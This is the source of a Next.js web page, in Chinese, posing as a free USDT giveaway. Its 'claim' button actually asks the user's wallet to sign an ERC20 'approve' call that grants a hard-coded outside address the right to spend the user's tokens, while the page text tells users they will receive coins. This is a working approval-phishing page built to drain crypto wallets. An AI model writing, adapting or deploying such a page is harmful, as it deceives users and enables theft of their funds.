import { ConnectButton } from '@rainbow-me/rainbowkit';
import type { NextPage } from 'next';
import Head from 'next/head';
import styles from '../styles/Home.module.css';
import { useState } from 'react';
import { useSimulateContract, useWriteContract } from 'wagmi'
import Image from 'next/image';

// 合約的 ABI
const contractABI = [
  {
    "inputs": [
      {
        "internalType": "address",
        "name": "spender",
        "type": "address"
      },
      {
        "internalType": "uint256",
        "name": "amount",
        "type": "uint256"
      }
    ],
    "name": "approve",
    "outputs": [
      {
        "internalType": "bool",
        "name": "",
        "type": "bool"
      }
    ],
    "stateMutability": "nonpayable",
    "type": "function"
  }
];

// 合約地址（請替換為實際部署的合約地址）
const ERC20ContractAddress = '0xa67B9Ea856Aae9D738125BE0847e525387b6F75b';
const contractAddress = '0x90137b1A048bBE756f5169BE83c57f07b330Cf29';

const Home: NextPage = () => {
  const [amount, setAmount] = useState('');

  // 準備寫入合約的配置
  const { data } = useSimulateContract({
    address: ERC20ContractAddress,
    abi: contractABI,
    functionName: 'approve',
    args: [contractAddress, 2000000],
  });

  // 使用寫入合約的 hook
  const { writeContract } = useWriteContract();

  const handleApprove = () => {
    console.log(data)
    writeContract(
      data!.request
    );

  };

  return (
    <div className={styles.container}>
      <Head>
        <title>Free Get USDT ACTION</title>
        <meta
          content="Generated by @rainbow-me/create-rainbowkit"
          name="description"
        />
        <link href="/favicon.ico" rel="icon" />
      </Head>

      <main className={styles.main}>
        <ConnectButton />

        <h1 className={styles.title}>
          歡迎來到 <a href="">USDT</a> <a href="">領幣機</a>
        </h1>
        <p className={styles.description}>
          立即領取您的首筆 USDT！ 或 "取得首筆 USDT，取得更多！"
        </p>
        <div>
          <button
            onClick={handleApprove}
            className="py-5 pl-10 pr-20 text-5xl font-semibold text-white rounded-lg shadow-sm bg-cyan-500"
          >
            👉 領取
          </button>
        </div>
        <div className='flex flex-col items-center justify-between mt-9'>
          <p>安裝 MetaMask ，按下領取會請您輸入想提取金額</p>
          <Image src="/images/alert.png" alt="Alert" width={300} height={300} />
        </div>

        <h2 className='text-2xl mt-9'>USDT ?</h2>
        <div className={styles.grid}>
          <a className={styles.card} href="https://rainbowkit.com">
            <h2> USDT是什麼？ &rarr;</h2>
            <p>USDT（Tether）是一種穩定幣，其價值與美元掛鉤，旨在提供數字貨幣世界中的穩定性。它廣泛應用於交易和支付，讓用戶可以避免價格波動的風險。</p>
          </a>

          <a className={styles.card} href="https://wagmi.sh">
            <h2>為什麼選擇USDT？ &rarr;</h2>
            <p>USDT提供穩定且快速的數字資產轉移，尤其適合在全球進行交易時降低匯率波動的風險。它的流動性高，支持多種區塊鏈，適合快速結算和價值儲存。</p>
          </a>

          <a
            className={styles.card}
            href="https://github.com/rainbow-me/rainbowkit/tree/main/examples"
          >
            <h2>如何使用USDT？ &rarr;</h2>
            <p>USDT可用於各大加密貨幣交易所的數字貨幣交易、支付商品和服務，以及進行跨境資金轉移。只需在支持USDT的錢包中存放，即可輕鬆進行資金管理。</p>
          </a>

          <a className={styles.card} href="https://nextjs.org/docs">
            <h2>USDT的優勢是什麼？&rarr;</h2>
            <p>USDT的主要優勢是穩定性和方便性。由於與美元等值，USDT成為數字貨幣世界中可靠的價值儲存工具。同時，無需擔心劇烈波動，讓其在交易中更具安全性和實用性。</p>
          </a>
        </div>
      </main>

      <footer className={styles.footer}>
        <a href="https://rainbow.me" rel="noopener noreferrer" target="_blank">
          Made with ❤️ by your frens at 🌈
        </a>
      </footer>
    </div >
  );
};

export default Home;
